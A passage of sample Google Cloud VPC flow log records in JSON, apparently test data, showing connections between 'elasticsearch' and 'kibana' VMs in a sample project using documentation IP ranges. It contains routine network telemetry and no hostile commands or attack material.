} -{"insertId":"y4wffpfk2eroi","jsonPayload":{"bytes_sent":"136375","connection":{"dest_ip":"10.87.40.76","dest_port":33538,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero8","jsonPayload":{"bytes_sent":"181424","connection":{"dest_ip":"203.0.113.134","dest_port":33690,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393929808Z","packets_sent":"241","reporter":"SRC","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erol","jsonPayload":{"bytes_sent":"9303","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"94","reporter":"DEST","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero4","jsonPayload":{"bytes_sent":"142871","connection":{"dest_ip":"203.0.113.134","dest_port":33572,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821149051Z","packets_sent":"77","reporter":"SRC","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eror","jsonPayload":{"bytes_sent":"158811","connection":{"dest_ip":"203.0.113.134","dest_port":33968,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"69","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erob","jsonPayload":{"bytes_sent":"13455","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"81","reporter":"DEST","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erox","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":57300,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroc","jsonPayload":{"bytes_sent":"71014","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65315},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"728","reporter":"DEST","rtt_msec":"210","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erok","jsonPayload":{"bytes_sent":"60749","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eros","jsonPayload":{"bytes_sent":"160451","connection":{"dest_ip":"203.0.113.134","dest_port":33880,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821138391Z","packets_sent":"66","reporter":"SRC","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erod","jsonPayload":{"bytes_sent":"169173","connection":{"dest_ip":"10.87.40.76","dest_port":33574,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"64","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero6","jsonPayload":{"bytes_sent":"118762","connection":{"dest_ip":"203.0.113.58","dest_port":65315,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"615","reporter":"SRC","rtt_msec":"210","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eron","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"96","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroy","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":57300},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erof","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.12","dest_port":54662,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erov","jsonPayload":{"bytes_sent":"11674","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erop","jsonPayload":{"bytes_sent":"62831","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"346","reporter":"DEST","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erou","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"93","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":54662},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erow","jsonPayload":{"bytes_sent":"64588","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erot","jsonPayload":{"bytes_sent":"67315","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"354","reporter":"DEST","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroq","jsonPayload":{"bytes_sent":"175633","connection":{"dest_ip":"10.87.40.76","dest_port":33576,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"67","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero5","jsonPayload":{"bytes_sent":"116981","connection":{"dest_ip":"203.0.113.134","dest_port":33540,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"234","reporter":"SRC","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroo","jsonPayload":{"bytes_sent":"67789","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.542406314Z","packets_sent":"344","reporter":"DEST","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"ptjoddfhmrhg9","jsonPayload":{"bytes_sent":"136166","connection":{"dest_ip":"203.0.113.134","dest_port":33538,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"245","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgh","jsonPayload":{"bytes_sent":"68262","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65257},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"718","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgj","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":52328},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgr","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":59790},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 